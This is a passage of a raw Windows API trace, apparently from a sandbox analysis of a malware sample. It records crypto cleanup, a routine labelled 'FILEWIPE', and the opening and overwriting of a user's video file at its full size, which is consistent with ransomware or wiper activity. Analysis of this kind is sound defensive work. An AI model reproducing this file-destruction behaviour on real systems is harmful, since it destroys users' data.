hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.151] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.152] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0198.152] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.152] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.152] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.152] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.152] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.152] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.152] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.152] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.152] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.152] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.153] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.153] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.153] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.153] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.153] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.153] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.153] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.155] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.155] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0198.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.155] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.156] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x5a7a7540, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="NsEh3.swf", cAlternateFileName="")) returned 0x90ae18 [0198.156] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0198.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.156] CharLowerBuffW (in: lpsz="byte[98470]", cchLength=0xb | out: lpsz="byte[98470]") returned 0xb [0198.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.156] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.157] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.157] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.157] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.158] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.158] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.159] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.159] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\nseh3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.159] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0198.160] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0198.160] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0198.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.160] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0198.160] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0198.160] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0198.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0198.161] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0198.161] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.161] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.161] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0198.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd558 [0198.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd558, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.162] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.162] WriteFile (in: hFile=0x160, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x180a6, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x180a6, lpOverlapped=0x0) returned 1 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | 